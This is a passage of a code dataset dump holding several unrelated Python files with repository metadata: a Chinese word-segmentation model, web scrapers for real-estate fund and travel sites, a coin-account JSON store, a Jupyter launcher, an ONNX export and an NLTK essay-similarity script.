将训练语料中的句子按标点切分,避免某些行过长,难以整个序列优化\ndef create_docs(file_name):\n docs = []\n chars, label = [], []\n\n with codecs.open(file_name, 'r', 'utf-8') as f:\n index = 0\n for line in f:\n line = line.strip()\n if len(line) == 0:\n if len(chars) != 0:\n docs.append(Documents(chars, label, index))\n chars = []\n label = []\n index += 1\n else:\n pieces = line.strip().split()\n chars.append(pieces[0])\n label.append(pieces[1])\n\n if pieces[0] in ['。', ',', ';']:\n docs.append(Documents(chars, label, index))\n chars = []\n label = []\n\n if len(chars) != 0:\n docs.append(Documents(chars, label, index))\n\n return docs\n\n\n# 生成词典,词典标号根据汉字(标点/数字/字母)出现次数标记,次数越多,标记越小\ndef get_lexicon(all_docs):\n chars = {}\n for doc in all_docs:\n for char in doc.chars:\n chars[char] = chars.get(char, 0) + 1\n\n # 按汉字(标点/数字/字母)出现次数降序排列\n sorted_chars = sorted(chars.items(), key=lambda x: x[1], reverse=True)\n\n # 词典下标从1开始,0位保留,用作补长位\n lexicon = dict([(item[0], index+1) for index, item in enumerate(sorted_chars)])\n lexicon_reverse = dict([(index+1, item[0]) for index, item in enumerate(sorted_chars)])\n\n return lexicon, lexicon_reverse\n\n\n# load预训练词向量,前后增加1个汉字的权重\ndef load_embedding(model, size, lexicon_reverse):\n weights = np.zeros((len(lexicon_reverse)+2, size))\n for i in range(len(lexicon_reverse)):\n weights[i+1] = model[lexicon_reverse[i+1]]\n weights[-1] = np.random.uniform(-1, 1, size)\n\n return weights\n\n\n# 将训练数据的原始格式转换为字典中的下标表示\ndef create_matrix(docs, lexicon, lab2idx):\n datas_list = []\n label_list = []\n index_list = []\n for doc in docs:\n datas_tmp = []\n label_tmp = []\n for char, label in zip(doc.chars, doc.label):\n datas_tmp.append(lexicon[char])\n label_tmp.append(lab2idx[label])\n datas_list.append(datas_tmp)\n label_list.append(label_tmp)\n index_list.append(doc.index)\n\n return datas_list, label_list, index_list\n\n\n# 训练数据按样本最大长度补长(前面补0),包括数据和标签\ndef padding_sentences(data_list, label_list, max_len):\n padding_data_list = sequence.pad_sequences(data_list, maxlen=max_len)\n padding_label_list = []\n for item in label_list:\n padding_label_list.append([0]*(max_len-len(item))+item)\n\n padding_label_list = np.array(padding_label_list)\n\n return padding_data_list, padding_label_list\n\n\n# 搭建BiLSTM-CNN-CRF模型\n# max_len:样本分句最大长度;char_dict_len:词典长度;label_len:分词任务标签长度\n# embedding_weights:词向量;is_train:训练标记\ndef bilstm_cnn_crf(max_len, char_dict_len, label_len, embedding_weights=None, is_train=True):\n word_input = Input(shape=(max_len,), dtype='int32', name='word_input')\n if is_train:\n word_emb = Embedding(char_dict_len+2, output_dim=100, input_length=max_len,\n weights=[embedding_weights], name='word_emb')(word_input)\n else:\n word_emb = Embedding(char_dict_len+2, output_dim=100, input_length=max_len,\n name='word_emb')(word_input)\n\n # BiLSTM\n bilstm = Bidirectional(LSTM(64, return_sequences=True))(word_emb)\n bilstm_d = Dropout(0.1)(bilstm)\n\n # CNN\n half_window_size = 2\n padding_layer = ZeroPadding1D(padding=half_window_size)(word_emb)\n cnn_conv = Conv1D(nb_filter=50, filter_length=2*half_window_size+1, padding='valid')(padding_layer)\n cnn_conv_d = Dropout(0.1)(cnn_conv)\n dense_conv = TimeDistributed(Dense(50))(cnn_conv_d)\n\n # BiLSTM+CNN\n rnn_cnn_merge = merge([bilstm_d, dense_conv], mode='concat', concat_axis=2)\n dense = TimeDistributed(Dense(label_len))(rnn_cnn_merge)\n\n # CRF\n crf = CRF(label_len, sparse_target=False)\n crf_output = crf(dense)\n\n # build model\n print(\"***** Building model...... \")\n model = Model(input=[word_input], output=[crf_output])\n model.compile(loss=crf.loss_function, optimizer='adam', metrics=[crf.accuracy])\n\n # model.summary()\n\n return model\n\n\ndef main():\n ## note\n # 把你的语料放到corpus文件夹下 我的corpus中的语料压缩了,如使用可以解压\n # 1. python embedding_model.py -> model_conll_law.m 生成词向量文件\n # 2. python bilstm_cnn_crf.py // is_train==1\n # 会得到 train_model.hdf5 lexicon.pkl\n # 3. 可以在之前的基础上train_model.hdf5,继续训练\n # 4. 训练完成,测试 is_train==0\n # python bilstm_cnn_crf.py 按句测试或按文件测试\n # my_weights 中存放的是我的权值\n\n is_train = 1 # 1/0\n\n if is_train == 1:\n # train ☆☆☆☆☆☆☆\n # 训练语料路径\n corpus_path = 'corpus'\n # 初始化模型参数 可在之前的基础上训练\n base_model_weight = 'train_model.hdf5'\n nb_epoch = 1 # 迭代轮数\n process_train(corpus_path, nb_epoch, base_model_weight)\n\n ##############################################\n\n lexicon, lexicon_reverse, max_len, index_2_label = pickle.load(open('lexicon.pkl', 'rb'))\n # model\n model = Bilstm_CNN_Crf(max_len, len(lexicon), len(index_2_label), is_train=False)\n model.load_weights('train_model.hdf5')\n\n # 长句子测试 按标点切分后测试\n text = ''\n for i in range(10):\n text += '南京市长莅临指导,大家热烈欢迎。公交车中将禁止吃东西!'\n splitText, predLabel = word_seg_by_sentences(text, model, lexicon, max_len)\n print(splitText)\n\n fenci_by_file('test_documents/test_1', 'test_documents/test_1_mine', model, lexicon, max_len)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Daniel1586/Initiative_deep_learning","sub_path":"04_recurrent_neural_network/cws_bilstm_cnn_crf/bilstm_cnn_crf_.py","file_name":"bilstm_cnn_crf_.py","file_ext":"py","file_size_in_byte":10697,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"28303224184","text":"\"\"\"\n多进程\n\"\"\"\n\"\"\"\n 多线程\n\"\"\"\nfrom test import *\nimport multiprocessing as mp\nimport time\n\njobs = []\ntm = time.time()\nfor i in range(10):\n t = mp.Process(target=count, args=(1,1))\n jobs.append(t)\n t.start()\n\n[i.join() for i in jobs]\n\nprint(\"Process cpu\", time.time()-tm)\n# Process cpu 2.108125925064087 计算\n# Process cpu 1.322871208190918  io\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"nandadao/Python_note","sub_path":"note/my_note/second_month/day08/multi_process.py","file_name":"multi_process.py","file_ext":"py","file_size_in_byte":389,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"41249642826","text":"\"\"\"Implements an i/o system for accessing and changing GasterCoin account values.\"\"\"\r\nimport ujson\r\n\r\nACCOUNTS_FILE = f'./subs/gastercoin/resources/accounts.json'\r\n\r\nBALANCE_KEY = 'balance'\r\nFREE_MONEY_KEY = 'free_money'\r\nSPECIAL_MOVE_KEY = 'special_move'\r\nDEFAULT_ACCOUNT = {BALANCE_KEY: 0,\r\n FREE_MONEY_KEY: 0,\r\n SPECIAL_MOVE_KEY: 'being lame and not having a special move set by typing '\r\n '`~dm special edit [message]`'}\r\n\r\nSUCCESS_STRING = 'SUCCESS'\r\n\r\n\r\ndef parse_int(number_as_string, return_bool=False):\r\n \"\"\"Converts an string into an int if the string represents a valid integer\"\"\"\r\n try:\r\n if len(number_as_string) > 1:\r\n int(str(number_as_string)[:-1])\r\n else:\r\n if len(number_as_string) == 0:\r\n if return_bool:\r\n return False\r\n else:\r\n raise ValueError\r\n if len(number_as_string) == 1 and number_as_string.isdigit():\r\n if return_bool:\r\n return True\r\n else:\r\n return int(number_as_string)\r\n else:\r\n if return_bool:\r\n return False\r\n else:\r\n raise ValueError\r\n except ValueError:\r\n if return_bool is False:\r\n raise ValueError\r\n else:\r\n return False\r\n last_char = str(number_as_string)[-1]\r\n if not return_bool:\r\n if last_char.isdigit():\r\n return int(number_as_string)\r\n elif last_char == 'k':\r\n return int(number_as_string[:-1]) * 1000\r\n elif last_char == 'm':\r\n return int(number_as_string[:-1]) * 1000000\r\n elif last_char == 'b':\r\n return int(number_as_string[:-1]) * 1000000000\r\n else:\r\n raise ValueError\r\n if return_bool:\r\n if last_char.isdigit() or last_char in ['k', 'm', 'b']:\r\n return True\r\n else:\r\n return False\r\n\r\n\r\ndef update_account(userid, amount, key=BALANCE_KEY):\r\n \"\"\"Changes the value of a key within a user's account.\"\"\"\r\n userid = str(userid)\r\n with open(ACCOUNTS_FILE, 'r') as f:\r\n accounts = ujson.load(f)\r\n\r\n if userid not in accounts:\r\n accounts[userid] = DEFAULT_ACCOUNT\r\n\r\n if key == BALANCE_KEY:\r\n accounts[str(userid)][BALANCE_KEY] += amount\r\n if key == FREE_MONEY_KEY:\r\n accounts[str(userid)][FREE_MONEY_KEY] = amount\r\n if key == SPECIAL_MOVE_KEY:\r\n accounts[str(userid)][SPECIAL_MOVE_KEY] = amount\r\n\r\n with open(ACCOUNTS_FILE, 'w') as f:\r\n ujson.dump(accounts, f)\r\n\r\n\r\ndef read_account(userid, key=BALANCE_KEY):\r\n \"\"\"Reads the value of a key within a user's account.\"\"\"\r\n userid = str(userid)\r\n try:\r\n with open(ACCOUNTS_FILE, 'r') as f:\r\n accounts = ujson.load(f)\r\n if userid not in accounts:\r\n accounts[userid] = DEFAULT_ACCOUNT\r\n return accounts[userid][key]\r\n except KeyError:\r\n return 0\r\n\r\n\r\ndef check_if_valid_transaction(userid, amount, username=None, zero_valid=False):\r\n \"\"\"Determines whether a user can make a transaction or not based on the inputted amount.\"\"\"\r\n try:\r\n amount = parse_int(str(amount))\r\n if amount <= 0 and not zero_valid or amount < 0 and zero_valid:\r\n return f'Error: G${amount} is not a valid transaction amount.'\r\n author_balance = read_account(userid)\r\n if author_balance < amount:\r\n if username is None:\r\n return f'Error: Insufficient funds. Your current balance is G${author_balance}.'\r\n else:\r\n return f\"Error: Insufficient funds. {username}'s current balance is G${author_balance}.\"\r\n return SUCCESS_STRING\r\n except ValueError:\r\n return f'Error: G${amount} is not a valid number.'\r\n","repo_name":"coizioc/math-bot-gastercoin","sub_path":"account.py","file_name":"account.py","file_ext":"py","file_size_in_byte":3913,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"15677685071","text":"#!/usr/bin/python3\n\n\"\"\"\nPerforms an update on table \"real_estates\" and \"real_estates_indices\"\n\nAuthor: Rozario Engenharia\n\nFirst release: December 1st, 2021\n\"\"\"\n\nfrom bs4 import BeautifulSoup # for parsing html pages (web scraping)\nfrom urllib.request import Request, urlopen\nfrom unidecode import unidecode\nimport configparser # for reading settings file\nimport sys # for command line arguments and for pointing rozlib library folder (path comes from config.ini file)\nimport re # for regular expressions purposes\nimport psycopg2 # for SQL interface\nfrom datetime import datetime # for getting timestamp and date\nimport traceback # for printting exception traceback\nimport math\n\n# Reads rozlib library, and fiislib library paths from config.ini file and import libraries packages\nrozlib_path = ''\ndef add_rozlib_library_path():\n global rozlib_path, fiislib_path\n config = configparser.ConfigParser()\n config.sections()\n config.read(r'config.ini', encoding='utf-8')\n rozlib_path = config['GENERAL']['rozlibFolderPath']\n sys.path.insert(1, rozlib_path)\n \n fiislib_path = config['GENERAL']['fiislibFolderPath']\n sys.path.insert(1, fiislib_path)\nadd_rozlib_library_path()\n\nfrom rozlib.database.postgres import Postgres\nfrom rozlib.util import Utilities\nimport fiislib\n\nreal_estates_column_names = [\n 'fii_id',\n 'description',\n 'state_province',\n 'goal',\n 'area',\n ]\n\nreal_estates_indices_column_names = [\n 'estate_id',\n 'timestamp',\n 'vacancy',\n 'non_payment'\n]\n\nverbosity = 1\n\n# Utilities object\nutilities = Utilities(verbosity)\n\n# Library with common methods for all information related to FIIs\nfiis_definition = fiislib.FIIs()\n\ndef getFiiRealEstatesDetailedInfo(fii_ticker):\n \"\"\"Gets detailed information about real estates from a FII\n\n Args:\n fii_ticker (str): FII ticker for which real estates' detailed information should be gathered\n\n Returns:\n list: list of dictionaries with detailed information about all real estates bound to the given FII:\n description\n state/province\n goal\n (surface) area\n vacancy\n non-payment\n \"\"\"\n \n realEstateDetailedInfo = []\n\n # With Beautiful Soup retrieves 0, 1 or many estates related to the given FII\n soup = BeautifulSoup(urlopen(Request(fiis_definition.FIIDetailedDataURLPart2.replace('FII_TICKER', fii_ticker), headers={\"User-Agent\": \"Mozilla/5.0\"})).read(), features='html.parser')\n try:\n portfolio_section = soup.find(\"div\", attrs={'id':'portfolio-section'}) # Main div\n non_land_real_estates_section = portfolio_section.find('div', attrs={'class':'card-list-box navigation-dot-white', 'data-title': 'IMÓVEL'}) # non landscapes div\n land_real_estates_section = portfolio_section.find('div', attrs={'class':'card-list-box navigation-dot-white', 'data-title': 'TERRENO'}) # landscapes div\n except AttributeError:\n utilities.eprint(2, f'{fii_ticker} has no page with detailed real estates information')\n return\n\n if non_land_real_estates_section == None:\n return []\n\n # Gets all estates' descriptions\n descriptions = []\n for currentEstateDescription in non_land_real_estates_section.findAll('div', attrs={'class':'name'}):\n descriptions.append(unidecode(u'{0}'.format(currentEstateDescription.find('span').text))) # Gets rid of special unicode characters\n\n # Gets all estates' states/provinces\n states_provinces = []\n for current_state_province in non_land_real_estates_section.findAll('strong', attrs={'class':'uf mr-1'}):\n states_provinces.append(current_state_province.text)\n \n # Gets all estates' goals\n goals = []\n for current_goal in non_land_real_estates_section.findAll('div', attrs={'class':re.compile(r'objective objective-[01]')}):\n goals.append(current_goal.find('strong', attrs={'class':'value'}).text)\n\n # Gets all estates' surface areas\n areas = []\n for current_area in non_land_real_estates_section.findAll('strong', attrs={'class':'value mt-0 w-55 justify-end d-flex'}):\n areas.append(float(current_area.find('span').text.replace('.', '').replace(',', '.').replace('m²', '')))\n\n # Gets all estates' vacancies and non-payment statuses\n vacancies = []\n non_payments = []\n i = 0\n for all_vacancy_non_payment_pairs in non_land_real_estates_section.findAll('div', attrs={'class':'d-flex justify-between align-items-center'}):\n for current_vacancy_non_payment_pair in all_vacancy_non_payment_pairs.findAll('strong', attrs={'class':'value'}):\n if i % 2 == 0:\n vacancies.append(float(current_vacancy_non_payment_pair.text.replace(',', '.').replace('%', '').replace('-', '-1')))\n else:\n non_payments.append(float(current_vacancy_non_payment_pair.text.replace(',', '.').replace('%', '').replace('-', '-1')))\n i = i + 1\n\n # Prepares the list of dictionaries with all estates' information\n try:\n for i in range(0, len(descriptions)):\n current_estate_dict = {}\n current_estate_dict['description'] = descriptions[i]\n current_estate_dict['state_province'] = states_provinces[i]\n current_estate_dict['goal'] = goals[i]\n current_estate_dict['area'] = areas[i]\n current_estate_dict['vacancy'] = vacancies[i]\n current_estate_dict['non_payment'] = non_payments[i]\n realEstateDetailedInfo.append(current_estate_dict)\n except IndexError as e:\n utilities.eprint(2, f'Problems recovering {fii_ticker} estates\\n{traceback.format_exc()}')\n\n return realEstateDetailedInfo\n\ndef registerNewEstateIfNecessary(fii_id, ticker, estateInfoDictionary, pgsql):\n \"\"\"Inserts a new Estate in the \"estates\" table, if it is not registered there yet\n fii_id FII identification in the reigistered_fiis table\n\n Args:\n fii_id (int): FII identification in the reigistered_fiis table\n ticker (str): FII ticker for which real estates' detailed information should be gathered\n estateInfoDictionary (dict): real estate information, containing the owner FII ID, its description, state/province, its goal and total area\n pgsql (postgres.Postgres): object with a valid connection to the SQL database\n\n Returns:\n int: just inserted estate id, or existing estate id, from the estates table\n \"\"\"\n \n # first checks if given estate already exists\n pgsql.cur.execute(\"SELECT estate_id\\n\"\n \"FROM real_estates\\n\"\n \"WHERE description = %s AND area = %s AND fii_id = %s;\",\n (estateInfoDictionary['description'],\n estateInfoDictionary['area'],\n fii_id, ))\n retrievedTuple = pgsql.cur.fetchone()\n \n # if the estate is not yet registered, inserts it in the estates table\n if retrievedTuple == None:\n estate_id = pgsql.exec_insert_query('real_estates',\n real_estates_column_names, \n (fii_id, estateInfoDictionary['description'],\n estateInfoDictionary['state_province'],\n estateInfoDictionary['goal'],\n estateInfoDictionary['area'], ),\n 'estate_id')\n pgsql.conn.commit()\n utilities.print_verbose(f'New real estate inserted for FII {ticker}', verbosity_level=1)\n return estate_id\n else:\n return retrievedTuple[0]\n\ndef updateFiiRealEstatesIndices(fii_id, ticker, estates_info_dict, pgsql):\n \"\"\"Updates indices of a single real estate, related to a given FII, in the real_estates_indices table\n\n Args:\n fii_id (int): FII identification in the reigistered_fiis table\n ticker (str): FII ticker for which real estates' detailed information should be updated\n estates_info_dict (dict): real estate information, containing the owner FII ID, its description, state/province, its goal and total area\n pgsql (postgres.Postgres): object with a valid connection to the SQL database\n \"\"\"\n \n # To make sure the correct real estate is picked from DB, rather than comparing description\n # and the FII to whose it belongs, also compares the area\n pgsql.cur.execute(\"SELECT rei.vacancy, rei.non_payment\\n\"\n \"FROM real_estates_indices AS rei, real_estates AS re\\n\"\n \"WHERE rei.estate_id = re.estate_id AND LOWER(re.description) = LOWER(%s) AND re.area = %s AND re.fii_id = %s\\n\"\n \"ORDER BY rei.timestamp DESC\",\n (estates_info_dict['description'],\n estates_info_dict['area'],\n fii_id, ))\n retrievedTuples = pgsql.cur.fetchone()\n \n # To pick the real estate ID it is necessary to check it apart of the real estate's indices, in\n # case there is no index bound to it yet\n pgsql.cur.execute( 'SELECT estate_id '\n 'FROM real_estates '\n 'WHERE description = %s AND area = %s AND fii_id = %s',\n (estates_info_dict['description'],\n estates_info_dict['area'],\n fii_id ))\n estate_id = pgsql.cur.fetchone()[0]\n \n if (retrievedTuples == None or\n (retrievedTuples != None and\n (estates_info_dict['vacancy'] != retrievedTuples[0] or estates_info_dict['non_payment'] != retrievedTuples[1]))):\n \n values = (estate_id, datetime.now(), estates_info_dict['vacancy'], estates_info_dict['non_payment'])\n try:\n pgsql.exec_insert_query('real_estates_indices', real_estates_indices_column_names, values)\n pgsql.conn.commit()\n utilities.print_verbose(f'Vacancy/non-payment updated to {ticker}, real estate {estates_info_dict[\"description\"]}, ID {estate_id}', verbosity_level=1)\n except psycopg2.errors.UniqueViolation:\n utilities.eprint(2, f'Error when updating {ticker}, estate id {estate_id}, estate description {estates_info_dict[\"description\"]}. Duplicated entry.')\n pgsql.conn.rollback()\n\ndef updateRealEstatesIndicesForFiis(current_fii):\n \"\"\"Updates real estates indices of a given FII\n\n Args:\n current_fii (tuple): FII information, with pattern (fii_id, ticker, historical_data_link)\n \"\"\"\n \n # Connects to the datebase\n postgres = Postgres(fiis_definition.dbname, fiis_definition.hostname, fiis_definition.postgres_port, fiis_definition.user_name, fiis_definition.user_passwd)\n postgres.connectToDatabase()\n\n # Picks real estates detailed information for the given FII\n current_fii_real_estates_dict = getFiiRealEstatesDetailedInfo(current_fii[1])\n if current_fii_real_estates_dict != None:\n for current_estate in current_fii_real_estates_dict:\n registerNewEstateIfNecessary(current_fii[0], current_fii[1], current_estate, postgres)\n updateFiiRealEstatesIndices(current_fii[0], current_fii[1], current_estate, postgres)\n \n # Disconnects from the database\n postgres.disconnectFromDatabase()\n\ndef main():\n # first, retrieves configuration data from the .ini file\n fiis_definition.retrieveConfigurationFromINIFile()\n\n # second, picks the list of available FIIs, from \"registered FIIs\" table\n fiis_list = fiis_definition.get_registered_fiis_list()\n\n # third, retrieves quotes information from FII\n utilities.call_function_for_single_or_multithread(fiis_list, updateRealEstatesIndicesForFiis)\n\nif __name__ == '__main__':\n utilities.call_function_with_elapsed_time(main)\n","repo_name":"GregorioRozario/cecdados","sub_path":"Python/database_loader/real_states_update.py","file_name":"real_states_update.py","file_ext":"py","file_size_in_byte":11437,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"39948258393","text":"import datetime\nimport time\nimport pytz\nimport random\nfrom apps.spider.spider_module.spider import MySpider\nfrom apps.spider.models import Calendar\n\n\nclass MafengwoSpider(MySpider):\n\tdomain = 'http://www.mafengwo.cn'\n\tstart_url = [\n\t\t'http://www.mafengwo.cn/app/calendar.php?year=2016', \n\t\t'http://www.mafengwo.cn/app/calendar.php?year=2015', \n\t\t'http://www.mafengwo.cn/app/calendar.php?year=2014', \n\t\t'http://www.mafengwo.cn/app/calendar.php?year=2013',\n\t]\n\n\tdef parse(self, response_and_url):\n\t\tresponse = response_and_url[0]\n\t\turls = set()\n\t\tfor href in response.xpath(\"//li[@class='_j_hover']/span[@class='mark']/a[1]/@href\"):\n\t\t\turls.add(self.url_join(href))\n\t\treturn urls\n\t\t# return self.Request(url, callback=self.parse_dir_item)\n\n\tdef parse_dir_item(self, response_and_url):\n\t\tresponse = response_and_url[0]\n\t\t\n\t\ttry:\n\t\t\titem = {}\n\t\t\titem['url'] = response_and_url[1]\n\t\t\titem['title'] = response.xpath(\"//div[@id='_j_cover_box']/div[@class='_j_titlebg']/div[@class='view_info']/div[@class='vi_con']/h1/text()\")[0].strip()\n\t\t\titem['img_src'] = response.xpath(\"//div[@id='_j_cover_box']/div[@class='set_bg _j_load_cover']/img/@src\")[0]\n\t\t\titem['ding_num'] = int(response.xpath(\"//div[@class='ding']/a/@data-vote\")[0])\n\t\t\titem['destinaion'] = response.xpath(\"//div[@class='mdd_info']/a/strong/text()\")[0].strip()\n\n\t\t\tcreated_at = response.xpath(\"//div[@class='person']/div[@class='vc_time']/span[@class='time']/text()\")[0].strip()\n\t\t\tcreated_at = datetime.datetime.strptime(created_at, '%Y-%m-%d %H:%M').replace(tzinfo=pytz.timezone('Asia/Shanghai'))\n\t\t\titem['created_at'] = created_at\n\n\t\texcept IndexError:\n\t\t\treturn\n\t\t\n\t\tobj, created = Calendar.objects.update_or_create(url=item['url'], defaults=item)\n\t\t\n\t\tprint('-------------------------------------')\n\t\tprint(item['title'])\n\n\tdef crawl(self):\n\t\tcounter = 0\n\t\t\n\t\tself.url_mgr.add_new_urls(self.start_url)\n\t\t\n\t\twhile self.url_mgr.has_new_url:\n\t\t\tcounter += 1\n\t\t\t\n\t\t\tif counter == 10:\n\t\t\t\ttime.sleep(random.randint(5, 15))\n\t\t\t\tcounter = 0\n\t\t\t\n\t\t\tnew_url = self.url_mgr.get_new_url()\n\t\t\t\n\t\t\tif new_url in self.start_url:\n\t\t\t\tnew_url_list = list(self.Request([new_url, ]))[0]\n\t\t\t\tself.url_mgr.add_new_urls(new_url_list)\n\t\t\telse:\n\t\t\t\tlist(self.Request([new_url, ], callback=self.parse_dir_item))","repo_name":"PU-101/sansanxin","sub_path":"apps/spider/mafengwo.py","file_name":"mafengwo.py","file_ext":"py","file_size_in_byte":2249,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"5613827474","text":"def Factorial(a):\n result = 1\n num = a\n\n while num > 0:\n result *= num\n num -= 1\n\n return result\n\na = input('number?')\n\nwhile not a.isdigit():\n a = input('again')\n\na = int(a)\n\nresult = Factorial(a)\n\n\n\n\nprint(result)\n","repo_name":"Cyntha-K/bioinfo-lecture-2021-07","sub_path":"0706/012.py","file_name":"012.py","file_ext":"py","file_size_in_byte":245,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"19329451529","text":"import asyncio\nimport os\nfrom time import sleep\n\nimport jupytext\n\n\nasync def run_jupyter_shell(port, token, pids):\n script = f\"\"\"\n export JUPYTER_TOKEN={token};\n PORT={port};\n jupyter notebook --no-browser --port=$PORT\n \"\"\"\n process = await asyncio.create_subprocess_shell(script)\n pids.append(process.pid + 1)\n\n\ndef start_jupyter_server(port=8009, token=\"token\"):\n pids = []\n asyncio.set_event_loop(asyncio.new_event_loop())\n asyncio.get_event_loop().run_until_complete(run_jupyter_shell(port, token, pids))\n asyncio.get_event_loop().close()\n return pids[0]\n\n\ndef modify_ipynb_file(path):\n notebook = jupytext.read(path)\n first_cell = notebook.cells[0]\n first_cell['source'] = first_cell['source'][:-1] + 'a\"'\n if len(first_cell['source']) > 10:\n first_cell['source'] = '\"a\"'\n jupytext.write(notebook, path)\n\n\ndef modify_py_file(path):\n with open(path) as f:\n data = f.read()\n line_1 = '\"some_old_code\"'\n line_2 = '\"some_new_code\"'\n\n if line_1 in data:\n data = data.replace(line_1, line_2)\n elif line_2 in data:\n data = data.replace(line_2, line_1)\n else:\n data = data + \"\\n\" + line_1\n with open(path, \"w\") as f:\n print(data, file=f, flush=True, end='')\n\n\nif __name__ == '__main__':\n os.setpgrp()\n start_jupyter_server()\n sleep(1000)\n","repo_name":"festeh/jure","sub_path":"test/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1358,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"7"} +{"seq_id":"13704196062","text":"from facemesh import FaceMesh\nimport torch\n\nnet = FaceMesh()\nnet.load_weights(\"facemesh.pth\")\ntorch.onnx.export(\n net,\n torch.randn(1, 3, 192, 192, device='cpu'),\n \"facemesh.onnx\",\n input_names=(\"image\", ),\n output_names=(\"preds\", \"confs\"),\n opset_version=9\n)","repo_name":"renyuehe/fork-ai-Facemesh","sub_path":"onnx_package.py","file_name":"onnx_package.py","file_ext":"py","file_size_in_byte":277,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"7"} +{"seq_id":"7090164037","text":"import nltk\nfrom nltk import word_tokenize, pos_tag\nfrom nltk.corpus import wordnet as wn\nimport re\nimport string\nimport inflect\nfrom nltk.tokenize import word_tokenize\nfrom nltk.corpus import stopwords\nfrom collections import Counter\nfrom string import punctuation\nfrom sklearn.feature_extraction.text import ENGLISH_STOP_WORDS as stop_words\n#import sklearn.feature_extraction.text.ENGLISH_STOP_WORDS as stop_words\nimport mysql.connector\nimport math as math\nfrom datetime import datetime\nfrom datetime import date\nfrom mysql.connector import Error\n# nltk.download()\n# connect database\nmydb=mysql.connector.connect(host='localhost',port=3308,user='root',passwd='',database='examinate')\n# extractive summarization:\n\ndef sent_tokenizer(s):\n sents = []\n for sent in s.split('.'):\n sents.append(sent.strip())\n return sents\n\n\ndef count_words(tokens):\n word_counts = {}\n for token in tokens:\n if token not in stop_words and token not in punctuation:\n if token not in word_counts.keys():\n word_counts[token] = 1\n else:\n word_counts[token] += 1\n return word_counts\n\n# word_counts\n\n\ndef word_freq_distribution(word_counts):\n freq_dist = {}\n max_freq = max(word_counts.values())\n for word in word_counts.keys():\n freq_dist[word] = (word_counts[word]/max_freq)\n return freq_dist\n\n\n# freq_dist\n\ndef score_sentences(sents, freq_dist, max_len=40):\n sent_scores = {}\n for sent in sents:\n words = sent.split(' ')\n for word in words:\n if word.lower() in freq_dist.keys():\n if len(words) < max_len:\n if sent not in sent_scores.keys():\n sent_scores[sent] = freq_dist[word.lower()]\n else:\n sent_scores[sent] += freq_dist[word.lower()]\n return sent_scores\n\n\n# sent_scores\n\ndef summarize(sent_scores, k):\n top_sents = Counter(sent_scores)\n summary = ''\n scores = []\n\n top = top_sents.most_common(k)\n for t in top:\n summary += t[0].strip() + '. '\n scores.append((t[1], t[0]))\n return summary[:-1], scores\n\n\np = inflect.engine()\ndef convert_number(text):\n # split string into list of words, initialise empty list\n temp_str = text.split()\n new_string = []\n for word in temp_str:\n # if word is a digit, convert the digit\n # to numbers and append into the new_string list\n if word.isdigit():\n temp = p.number_to_words(word)\n new_string.append(temp)\n # append the word as it is\n else:\n new_string.append(word)\n # join the words of new_string to form a string\n temp_str = ' '.join(new_string)\n return temp_str\ndef clean_text(essay):\n essay=str(essay)\n result = re.sub(r'http[^\\s]*', '',essay)\n result = re.sub('[0-9]+','', result).lower()\n result = re.sub('@[a-z0-9]+', '', result)\n return re.sub('[%s]*' % string.punctuation, '',result)\n\ndef deEmojify(essay):\n return essay.encode('ascii', 'ignore').decode('ascii')\n\ndef filtered_words(textToken):\n stop_words = stopwords.words('english')\n filteredwords = [word for word in textToken if word not in stop_words]\n return filteredwords\n\n\ndef penn_to_wn(tag):\n \"\"\" Convert between a Penn Treebank tag to a simplified Wordnet tag \"\"\"\n if tag.startswith('N'):\n return 'n'\n\n if tag.startswith('V'):\n return 'v'\n\n if tag.startswith('J'):\n return 'a'\n\n if tag.startswith('R'):\n return 'r'\n\n return None\n\ndef tagged_to_synset(word, tag):\n wn_tag = penn_to_wn(tag)\n if wn_tag is None:\n return None\n\n try:\n return wn.synsets(word, wn_tag)[0]\n except:\n return None\n\n\n# def sent_counter(sents):\n# sent_count=0\n# for sent in sents:\n# sent_count+=1\n# return sent_count\n\n\ndef sentence_summarization(texts) :\n sents = sent_tokenizer(texts)\n tokens = word_tokenize(texts)\n word_counts = count_words(tokens)\n freq_dist = word_freq_distribution(word_counts)\n sent_scores = score_sentences(sents, freq_dist)\n # sent_count=sent_counter(sents)\n # top_n=sent_count\n summary , summary_sent_scores = summarize(sent_scores,1)\n print(summary)\n return summary\n\ndef sim1(sentence1,sentence2):\n \"\"\" compute the sentence similarity using Wordnet \"\"\"\n # convert number,clean_text and\n sentence1 = deEmojify(clean_text(convert_number(sentence1)))\n sentence2 = deEmojify(clean_text(convert_number(sentence2)))\n # print(sentence1)\n # Tokenize and tag\n sentence1 = pos_tag(filtered_words(word_tokenize(sentence1)))\n sentence2 = pos_tag(filtered_words(word_tokenize(sentence2)))\n\n # Get the synsets for the tagged words\n synsets1 = [tagged_to_synset(*tagged_word) for tagged_word in sentence1]\n synsets2 = [tagged_to_synset(*tagged_word) for tagged_word in sentence2]\n # print(synsets1)\n # print(synsets2)\n # Filter out the Nones\n synsets1 = [ss for ss in synsets1 if ss]\n synsets2 = [ss for ss in synsets2 if ss]\n print(synsets1)\n print(synsets2)\n score, count = 0.0, 0\n\n # For each word in the first sentence\n for synset in synsets1:\n # Get the similarity value of the most similar word in the other sentence\n # Wu - Palmer Similarity: Return a score denoting how similar two word senses are, based on the depth\n # of the two senses in the taxonomy and that of their Least Common Subsumer(most specific ancestor node).Note that\n # at this time the scores given do _not_ always agree\n # with those given by Pedersen's Perl implementation of Wordnet Similarity.\n\n x1 = [synset.wup_similarity(ss) for ss in synsets2]\n print(x1)\n x2 = [0]\n for i in x1:\n if i is not None:\n x2.append(i)\n best_score = max(x2)\n # Check that the similarity could have been 